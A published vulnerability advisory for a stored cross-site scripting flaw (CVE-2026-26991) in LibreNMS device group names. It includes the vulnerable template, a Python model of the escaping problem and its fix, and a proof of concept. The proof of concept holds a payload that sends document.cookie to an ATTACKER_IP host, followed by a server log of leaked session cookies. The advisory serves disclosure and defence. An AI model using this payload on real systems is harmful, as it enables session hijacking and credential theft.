LibreNMS Stored Cross-Site Scripting in Device Group Names
CVE-2026-26991
GHSA-5pqf-54qp-32wx
Summary
A LibreNMS user with admin privileges can be targeted through a device group whose name carries a crafted payload: when such a user views the group and clicks its Delete button, the script embedded in the name runs in their browser. To fix this, LibreNMS developers should escape user-supplied device group names for the context they are rendered in so that the name cannot be executed as code.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| librenms | librenms | <= 26.2.0 | – |
Original title
LibreNMS /device-groups name Stored Cross-Site Scripting
Original description
### Summary
**/device-groups name Stored Cross-Site Scripting**
- HTTP POST
- Request-URI(s): "/device-groups"
- Vulnerable parameter(s): "name"
- Attacker must be authenticated with "admin" privileges.
- When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter.
- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.
### Details
The vulnerability exists because the name of the device group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:
_resources/views/device-group/index.blade.php:_
```
@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]
<button type="button" class="btn btn-danger btn-sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id) }}')">
// the device group's name is placed in the Delete button's onclick handler without sanitizing for XSS-related characters/strings
```
As the device group's name is not sanitized of HTML/JavaScript-related characters or strings, this results in stored cross-site scripting.
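The mechanism above, modelled in an added Python example that is not LibreNMS code: Blade's `{{ }}` does HTML-escape the name, but inside an `onclick` attribute the browser decodes those entities before the JS engine parses the handler, so a quote in the name still terminates the string literal. The hardened renderer and all function names here are assumptions of this example; it mirrors PHP's `json_encode` with the `JSON_HEX_*` flags rather than any specific LibreNMS patch.

```python
import html
import json

# Constructed sample names (not from the advisory): one benign, one payload-shaped.
BENIGN_NAME = "Core Switches"
HOSTILE_NAME = "12345');alert(1);delete_dg(this, '12345"

def render_onclick_html_escaped(name: str) -> str:
    # Vulnerable pattern: Blade's {{ }} HTML-escapes (htmlspecialchars, ENT_QUOTES),
    # but the value lands inside a JS string literal inside an onclick attribute.
    return f"onclick=\"delete_dg(this, '{html.escape(name)}')\""

def render_onclick_json_escaped(name: str) -> str:
    # Hardened pattern: JSON string literal with < > & ' " hex-escaped, as PHP's
    # json_encode(JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_QUOT|JSON_HEX_AMP) emits.
    # No quote survives HTML decoding; the JS engine restores \u0027 only inside
    # the literal, so the name cannot terminate it.
    inner = json.dumps(name, ensure_ascii=False)[1:-1]  # drop JSON delimiters
    for raw, esc in (("<", "\\u003C"), (">", "\\u003E"), ("&", "\\u0026"),
                     ("'", "\\u0027"), ('\\"', "\\u0022")):
        inner = inner.replace(raw, esc)
    return 'onclick="delete_dg(this, ' + html.escape('"' + inner + '"') + ')"'

def browser_handler_source(attr_html: str) -> str:
    # What the JS engine receives: the attribute value after the HTML parser
    # decodes entities, so &#x27; is a plain apostrophe again.
    return html.unescape(attr_html[len('onclick="'):-1])

def js_string_arg(handler_src: str):
    # Tokenise the first argument after "this, " as one JS string literal,
    # honouring backslash escapes. Returns (literal, text_after_literal).
    body = handler_src[len("delete_dg(this, "):]
    quote, i = body[0], 1
    while i < len(body):
        if body[i] == "\\":
            i += 2
        elif body[i] == quote:
            return body[:i + 1], body[i + 1:]
        else:
            i += 1
    return body, ""

def name_stays_inside_literal(attr_html: str) -> bool:
    # True only if the name is still a single string argument followed by ')'.
    return js_string_arg(browser_handler_source(attr_html))[1] == ")"

def decoded_name(attr_html: str) -> str:
    # The name the JS engine would pass to delete_dg for the hardened rendering.
    return json.loads(js_string_arg(browser_handler_source(attr_html))[0])
```

Moving the name into a `data-*` attribute and reading `this.dataset` inside `delete_dg`, or using Laravel's `Js::from()` / `@js` helpers, achieves the same separation of data from handler code.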
### PoC
- Login
- Select Devices > Manage Groups
- Select New Device Group
- Input `12345');var pt=new Image();pt.src='http://<ATTACKER_IP>/cookie-'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345` into the "Name" input box (change `<ATTACKER_IP>` to the IP of an attacker-controlled web server)
- Select "access_points.accesspoint_id" as the Conditional input
- Input 1 into the Conditional value input box
- Select Save
- Select the Delete Icon for the newly created Device Group
- Select OK
- The JavaScript payload is not sanitized and an HTTP request is sent to the attacker-controlled server, leaking the user's cookies.
### Impact
Attacker-controlled server's logs:
```
192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai
l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh
LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL
Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"
```
NVD CVSS 3.1: 4.8
NVD CVSS 4.0: 5.1
Vulnerability type: CWE-79 Cross-site Scripting (XSS)
- https://nvd.nist.gov/vuln/detail/CVE-2026-26991
- https://github.com/advisories/GHSA-5pqf-54qp-32wx
- https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0b... Patch
- https://github.com/librenms/librenms/pull/19041 Issue Tracking
- https://github.com/librenms/librenms/releases/tag/26.2.0 Product Release Notes
- https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx Exploit Third Party Advisory
Published: 18 Feb 2026 · Updated: 11 Mar 2026 · First seen: 6 Mar 2026